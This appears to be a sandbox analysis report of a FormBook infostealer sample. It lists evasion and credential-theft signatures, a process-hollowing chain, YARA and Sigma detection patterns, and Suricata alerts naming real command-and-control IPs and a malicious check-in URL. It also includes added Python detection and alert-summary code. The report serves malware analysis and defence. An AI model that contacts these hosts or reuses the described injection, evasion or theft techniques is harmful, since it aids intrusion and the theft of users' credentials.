Windows Analysis Report
PO #86637.exe

Overview

General Information

Sample name: PO #86637.exe
Analysis ID: 1515412
MD5: 7fe19c52241499f1a94815ca779701d2
SHA1: 86a466d7ce6653c205f78c7f1d473e35b6d520e6
SHA256: 3d0f325a9cdb285dcaef0c137211ae8d3cc2d4978c25ecc39efd38677656787c
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO #86637.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\PO #86637.exe" MD5: 7FE19C52241499F1A94815CA779701D2)
    • svchost.exe (PID: 6736 cmdline: "C:\Users\user\Desktop\PO #86637.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • yRUFfzlnDkMN.exe (PID: 3688 cmdline: "C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • at.exe (PID: 7004 cmdline: "C:\Windows\SysWOW64\at.exe" MD5: 2AE20048111861FA09B709D3CC551AD6)
          • yRUFfzlnDkMN.exe (PID: 5924 cmdline: "C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7136 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2be90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2be90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 memory-dump matches in total; the remaining entries are not reproduced here)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e4f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f2f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\PO #86637.exe", CommandLine: "C:\Users\user\Desktop\PO #86637.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ParentImage: C:\Users\user\Desktop\PO #86637.exe, ParentProcessId: 6668, ParentProcessName: PO #86637.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ProcessId: 6736, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\PO #86637.exe", CommandLine: "C:\Users\user\Desktop\PO #86637.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ParentImage: C:\Users\user\Desktop\PO #86637.exe, ParentProcessId: 6668, ParentProcessName: PO #86637.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ProcessId: 6736, ProcessName: svchost.exe
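The two Sigma matches above expose the fields a host-based detection needs: the new process image is C:\Windows\SysWOW64\svchost.exe, its parent is the sample on the desktop rather than services.exe, and its command line is the parent's own path, which is what a process-hollowing (RunPE) launch of a suspended svchost.exe looks like in telemetry. The following is an added example, not Joe Sandbox or Sigma code: a Python checker that applies both tests (uncommon svchost.exe parent; command line naming a different executable than the image) to Sysmon-style process-creation events. The events are constructed from the report's process tree plus one benign control, and the allow-list of legitimate svchost.exe parents is an illustrative assumption, not the Sigma rule's list.

```python
"""Process-creation checks for the two indicators in the Sigma matches:
svchost.exe with an uncommon parent, and a command line that names a
different executable than the process image (hollowing).  Added example,
not Joe Sandbox or Sigma code.  EVENTS is constructed from the report's
process tree plus a benign control; LEGIT_SVCHOST_PARENTS is an
illustrative allow-list (assumption), not the Sigma rule's own list."""
import ntpath

# Parents that legitimately start svchost.exe on a default Windows 10 host.
# Assumption for this example; tune to your fleet.
LEGIT_SVCHOST_PARENTS = {
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\msmpeng.exe",
    r"c:\windows\system32\mrt.exe",
    r"c:\windows\system32\rpcnet.exe",
}


def exe_from_cmdline(cmdline: str) -> str:
    """Executable path named by a Windows command line (quoted or not)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def check_event(ev: dict) -> list:
    """Return the findings for one process-creation event (empty if clean)."""
    findings = []
    image = ev["Image"]
    parent = ev["ParentImage"]
    if (ntpath.basename(image).lower() == "svchost.exe"
            and parent.lower() not in LEGIT_SVCHOST_PARENTS):
        findings.append(
            f"svchost.exe (PID {ev['ProcessId']}) started by uncommon parent {parent}")
    claimed = exe_from_cmdline(ev["CommandLine"])
    if claimed and ntpath.basename(claimed).lower() != ntpath.basename(image).lower():
        findings.append(
            f"command line names {claimed} but image is {image} (possible process hollowing)")
    return findings


# Constructed events.  The first two mirror the report's process tree;
# the third is a benign svchost.exe start added as a control.
EVENTS = [
    {"ProcessId": 6736, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\PO #86637.exe"',
     "ParentProcessId": 6668, "ParentImage": r"C:\Users\user\Desktop\PO #86637.exe"},
    {"ProcessId": 7004, "Image": r"C:\Windows\SysWOW64\at.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\at.exe"',
     "ParentProcessId": 3688,
     "ParentImage": r"C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe"},
    {"ProcessId": 1234, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentProcessId": 700, "ParentImage": r"C:\Windows\System32\services.exe"},
]


def run(events=EVENTS) -> dict:
    """Map PID -> findings for every event that triggered at least one."""
    return {ev["ProcessId"]: f for ev in events if (f := check_event(ev))}


if __name__ == "__main__":
    for pid, findings in run().items():
        print(pid, *findings, sep="\n  ")
```

The at.exe event is deliberately included as a second control: its command line matches its image, so the hollowing test stays quiet even though the parent is unusual; that is the case where a parent-child rule for the specific LOLBin, not a generic svchost.exe rule, would be needed.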
Suricata SID 2050745 (ET MALWARE FormBook CnC Checkin (GET) M5)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-22T17:39:57.205741+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 34.150.58.73 | 80 | TCP
2024-09-22T17:40:29.297393+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 195.24.68.25 | 80 | TCP
2024-09-22T17:40:42.733820+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 162.0.213.94 | 80 | TCP
2024-09-22T17:40:57.183412+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 154.23.184.240 | 80 | TCP
2024-09-22T17:41:11.894995+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 47.104.180.139 | 80 | TCP
2024-09-22T17:41:33.166974+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 3.33.130.190 | 80 | TCP
2024-09-22T17:41:54.448144+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 199.59.243.227 | 80 | TCP
2024-09-22T17:42:07.804051+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49765 | 162.241.226.190 | 80 | TCP
2024-09-22T17:42:21.791909+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49769 | 91.215.85.23 | 80 | TCP

Suricata SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-22T17:39:57.205741+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 34.150.58.73 | 80 | TCP
2024-09-22T17:40:29.297393+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 195.24.68.25 | 80 | TCP
2024-09-22T17:40:42.733820+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 162.0.213.94 | 80 | TCP
2024-09-22T17:40:57.183412+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 154.23.184.240 | 80 | TCP
2024-09-22T17:41:11.894995+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 47.104.180.139 | 80 | TCP
2024-09-22T17:41:33.166974+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 3.33.130.190 | 80 | TCP
2024-09-22T17:41:54.448144+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49761 | 199.59.243.227 | 80 | TCP
2024-09-22T17:42:07.804051+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 162.241.226.190 | 80 | TCP
2024-09-22T17:42:21.791909+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49769 | 91.215.85.23 | 80 | TCP

Suricata SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-22T17:40:21.659147+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 195.24.68.25 | 80 | TCP
2024-09-22T17:40:24.215429+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 195.24.68.25 | 80 | TCP
2024-09-22T17:40:26.891623+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 195.24.68.25 | 80 | TCP
2024-09-22T17:40:35.188295+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 162.0.213.94 | 80 | TCP
2024-09-22T17:40:37.650196+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 162.0.213.94 | 80 | TCP
2024-09-22T17:40:40.218478+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 162.0.213.94 | 80 | TCP
2024-09-22T17:40:49.472166+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 154.23.184.240 | 80 | TCP
2024-09-22T17:40:52.031569+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 154.23.184.240 | 80 | TCP
2024-09-22T17:40:54.630810+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 154.23.184.240 | 80 | TCP
2024-09-22T17:41:04.176557+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 47.104.180.139 | 80 | TCP
2024-09-22T17:41:06.675895+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 47.104.180.139 | 80 | TCP
2024-09-22T17:41:09.615190+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 47.104.180.139 | 80 | TCP
2024-09-22T17:41:25.537878+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 3.33.130.190 | 80 | TCP
2024-09-22T17:41:28.093068+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 3.33.130.190 | 80 | TCP
2024-09-22T17:41:30.632214+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 3.33.130.190 | 80 | TCP
2024-09-22T17:41:46.924343+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 199.59.243.227 | 80 | TCP
2024-09-22T17:41:49.395064+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 199.59.243.227 | 80 | TCP
2024-09-22T17:41:52.520986+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49760 | 199.59.243.227 | 80 | TCP
2024-09-22T17:42:00.094039+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49762 | 162.241.226.190 | 80 | TCP
2024-09-22T17:42:02.976646+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 162.241.226.190 | 80 | TCP
2024-09-22T17:42:05.325691+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 162.241.226.190 | 80 | TCP
2024-09-22T17:42:14.195272+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 91.215.85.23 | 80 | TCP
2024-09-22T17:42:16.718948+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49767 | 91.215.85.23 | 80 | TCP
2024-09-22T17:42:19.288646+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 91.215.85.23 | 80 | TCP
2024-09-22T17:42:27.767760+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49770 | 84.32.84.32 | 80 | TCP
2024-09-22T17:42:30.297965+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 84.32.84.32 | 80 | TCP
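The three alert tables above contain 44 rows but describe far fewer events: the sample works through its list of C2 hosts one at a time, sending three POST check-ins roughly 2.5 seconds apart and then a GET, and the two GET signatures (2050745 and 2855465) fire on the same flow, so counting alerts overstates the number of connections. What an analyst wants is one line per destination with first/last seen, the number of distinct flows, and whether the full cycle completed. The following is an added example, not Joe Sandbox code: Python that parses alert rows (constructed inline from the first three destinations in the tables) and collapses them per destination, deduplicating by source port. The POST,POST,POST,GET "check-in cycle" label is an assumption drawn from these tables, not a published FormBook protocol description.

```python
"""Collapse Suricata alerts into one summary per C2 destination.  Added
example, not Joe Sandbox code.  ALERT_ROWS is constructed from the first
three destinations in the report's alert tables; the POST,POST,POST,GET
"check-in cycle" classification is an assumption drawn from those tables."""
from collections import Counter, defaultdict
from datetime import datetime

# Signature names as listed in the report's Networking section.
SID_NAMES = {
    2050745: "ET MALWARE FormBook CnC Checkin (GET) M5",
    2855465: "ETPRO MALWARE FormBook CnC Checkin (GET) M2",
    2855464: "ETPRO MALWARE FormBook CnC Checkin (POST) M3",
}

# Constructed input: timestamp|sid|severity|src|sport|dst|dport|proto
ALERT_ROWS = """\
2024-09-22T17:39:57.205741+0200|2050745|1|192.168.2.4|49736|34.150.58.73|80|TCP
2024-09-22T17:39:57.205741+0200|2855465|1|192.168.2.4|49736|34.150.58.73|80|TCP
2024-09-22T17:40:21.659147+0200|2855464|1|192.168.2.4|49738|195.24.68.25|80|TCP
2024-09-22T17:40:24.215429+0200|2855464|1|192.168.2.4|49739|195.24.68.25|80|TCP
2024-09-22T17:40:26.891623+0200|2855464|1|192.168.2.4|49740|195.24.68.25|80|TCP
2024-09-22T17:40:29.297393+0200|2050745|1|192.168.2.4|49741|195.24.68.25|80|TCP
2024-09-22T17:40:29.297393+0200|2855465|1|192.168.2.4|49741|195.24.68.25|80|TCP
2024-09-22T17:40:35.188295+0200|2855464|1|192.168.2.4|49742|162.0.213.94|80|TCP
2024-09-22T17:40:37.650196+0200|2855464|1|192.168.2.4|49743|162.0.213.94|80|TCP
2024-09-22T17:40:40.218478+0200|2855464|1|192.168.2.4|49744|162.0.213.94|80|TCP
2024-09-22T17:40:42.733820+0200|2050745|1|192.168.2.4|49745|162.0.213.94|80|TCP
2024-09-22T17:40:42.733820+0200|2855465|1|192.168.2.4|49745|162.0.213.94|80|TCP
"""


def parse_alert(row: str) -> dict:
    ts, sid, sev, src, sport, dst, dport, proto = row.split("|")
    # %z accepts the "+0200" form used in the report on every Python 3.
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "severity": int(sev), "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport), "proto": proto}


def method_of(sid: int) -> str:
    return "POST" if "(POST)" in SID_NAMES.get(sid, "") else "GET"


def classify(alerts: list) -> str:
    """HTTP-method sequence per flow; one flow = one client source port."""
    seq = []
    for a in alerts:                      # alerts are already sorted by time
        if not seq or seq[-1][0] != a["sport"]:   # two SIDs on one flow count once
            seq.append((a["sport"], method_of(a["sid"])))
    methods = [m for _, m in seq]
    if methods == ["POST", "POST", "POST", "GET"]:
        return "full check-in cycle"
    if methods == ["GET"]:
        return "GET-only probe"
    return "partial: " + ",".join(methods)


def summarise(rows: str = ALERT_ROWS) -> list:
    by_dst = defaultdict(list)
    for a in map(parse_alert, rows.strip().splitlines()):
        by_dst[(a["dst"], a["dport"])].append(a)
    out = []
    for (dst, dport), alerts in by_dst.items():
        alerts.sort(key=lambda a: (a["ts"], a["sport"]))
        flows = sorted({(a["sport"], a["ts"]) for a in alerts}, key=lambda f: f[1])
        gaps = [(b[1] - a[1]).total_seconds() for a, b in zip(flows, flows[1:])]
        out.append({
            "dst": f"{dst}:{dport}",
            "first_seen": flows[0][1],
            "last_seen": flows[-1][1],
            "flows": len(flows),
            "alerts": len(alerts),
            "sids": {SID_NAMES.get(s, str(s)): n
                     for s, n in Counter(a["sid"] for a in alerts).items()},
            "mean_gap_s": round(sum(gaps) / len(gaps), 2) if gaps else None,
            "pattern": classify(alerts),
        })
    out.sort(key=lambda s: s["first_seen"])
    return out


if __name__ == "__main__":
    for s in summarise():
        print(f"{s['dst']:<20} flows={s['flows']} alerts={s['alerts']} "
              f"gap={s['mean_gap_s']}s {s['pattern']}")
```

Run against the full tables, the same code yields nine destinations plus 84.32.84.32, which shows only two POSTs before the analysis ended; the "partial" label is the cue that the IOC list is truncated by the sandbox run time rather than complete.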

            AV Detection

Source: PO #86637.exe | Avira: detected
Source: http://www.kalomor.top/1i25/?6X=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&_vft=vxWlbDi8ipa49jzp | Avira URL Cloud: Label: malware
Source: http://www.kalomor.top/1i25/ | Avira URL Cloud: Label: malware
Source: http://www.kalomor.top | Avira URL Cloud: Label: malware
Source: kalomor.top | Virustotal: Detection: 5%
Source: www.kalomor.top | Virustotal: Detection: 5%
Source: www.teksales.space | Virustotal: Detection: 7%
Source: http://www.kalomor.top | Virustotal: Detection: 5%
Source: PO #86637.exe | Virustotal: Detection: 50%
Source: PO #86637.exe | ReversingLabs: Detection: 73%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO #86637.exe | Joe Sandbox ML: detected
Source: PO #86637.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: at.pdb source: svchost.exe, 00000001.00000003.1803876072.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845110294.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000003.2248775259.000000000102B000.00000004.00000001.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547175896.0000000001017000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yRUFfzlnDkMN.exe, 00000002.00000000.1759627743.0000000000BFE000.00000002.00000001.01000000.00000004.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3547128633.0000000000BFE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO #86637.exe, 00000000.00000003.1695463679.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, PO #86637.exe, 00000000.00000003.1696781527.0000000004860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1744447848.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1746074684.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.0000000003400000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1845344566.0000000003732000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1848717012.00000000038EF000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO #86637.exe, 00000000.00000003.1695463679.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, PO #86637.exe, 00000000.00000003.1696781527.0000000004860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1744447848.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1746074684.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.0000000003400000.00000040.00001000.00020000.00000000.sdmp, at.exe, at.exe, 00000003.00000003.1845344566.0000000003732000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1848717012.00000000038EF000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: at.pdbGCTL source: svchost.exe, 00000001.00000003.1803876072.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845110294.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000003.2248775259.000000000102B000.00000004.00000001.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547175896.0000000001017000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: at.exe, 00000003.00000002.3546898419.0000000003452000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3549391269.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918974804.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.00000000388EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: at.exe, 00000003.00000002.3546898419.0000000003452000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3549391269.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918974804.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.00000000388EC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
